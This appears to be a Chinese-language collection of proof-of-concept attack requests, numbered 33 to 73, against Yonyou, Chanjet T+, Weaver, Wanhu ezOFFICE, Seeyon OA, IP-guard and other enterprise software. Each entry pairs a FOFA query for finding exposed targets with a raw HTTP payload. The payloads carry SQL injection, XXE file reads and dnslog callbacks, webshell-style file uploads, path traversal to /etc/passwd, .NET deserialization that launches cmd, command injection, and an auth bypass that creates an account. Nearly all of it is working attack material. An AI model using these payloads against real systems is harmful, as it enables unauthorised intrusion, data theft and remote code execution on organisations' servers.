version= NC633、NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
33. 用友NC downTax/download SQL注入
version:NC6.5FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
34. 用友NC warningDetailInfo接口SQL注入
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
35. 用友NC-Cloud importhttpscer任意文件上传
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--
36. 用友NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
37. 用友NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>
38. 用友U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
39. 用友U8 Cloud RegisterServlet SQL注入
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
40. 用友U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close
42. 用友GRP-U8 SmartUpload01 文件上传
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
PAYLOAD
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
<soapenv:Header/>
<soapenv:Body>
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
</ser:getUserNameById>
</soapenv:Body>
</soapenv:Envelope>
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
45. 用友GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
47. 用友GRP A++Cloud 政府财务云 任意文件读取
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close
48. 用友U8 CRM swfupload 任意文件上传
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream
wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"
upload
-----------------------------vvv3wdayqv3yppdxvn3w--
http://x.x.x.x/tmpfile/updB3CB.tmp.php
50. QDocs Smart School 6.4.1 filterRecords SQL注入
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
searchdata=&searchdata=1&searchdata=1&searchdata=1&searchdata=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata=1
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
52. 泛微E-Office json_common.php sql注入
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
53. 迪普 DPTech VPN Service 任意文件上传
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
FOFA:app="畅捷通-TPlus"
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
完整数据包
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593
{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo":{
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd",
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
}
}
}
}
第二步,访问如下url
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
55. 畅捷通T+ getdecallusers信息泄露
FOFA:app="畅捷通-TPlus"
第一步,通过
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
第二步,利用获取到的Cookie请求
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json
{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo": {
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
}
}
}
}
57. 畅捷通T+ keyEdit.aspx SQL注入
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
58. 畅捷通T+ KeyInfoList.aspx sql注入
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
PAYLOAD
60. 百卓Smart管理平台 importexport.php SQL注入
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
8uxssX66eqrqtKObcVa0kid98xa
62. IP-guard WebServer 远程命令执行
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
访问
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
63. IP-guard WebServer任意文件读取
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetOSpById xmlns="http://tempuri.org/">
<sId>1';waitfor delay '0:0:5'--+</sId>
</GetOSpById>
</soap:Body>
</soap:Envelope>
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
响应200即成功创建账号test123456/123456
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
67. 万户ezOFFICE wpsservlet任意文件上传
FOFA:app="万户网络-ezOFFICE"
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1
--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
68. 万户ezOFFICE wf_printnum.jsp SQL注入
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
69. 万户 ezOFFICE contract_gd.jsp SQL注入
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
70. 万户ezEIP success 命令执行
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702
__VIEWSTATE=PAYLOAD
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.xx.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
73. GeoServer wms远程代码执行
FOFA:icon_hash=”97540678”
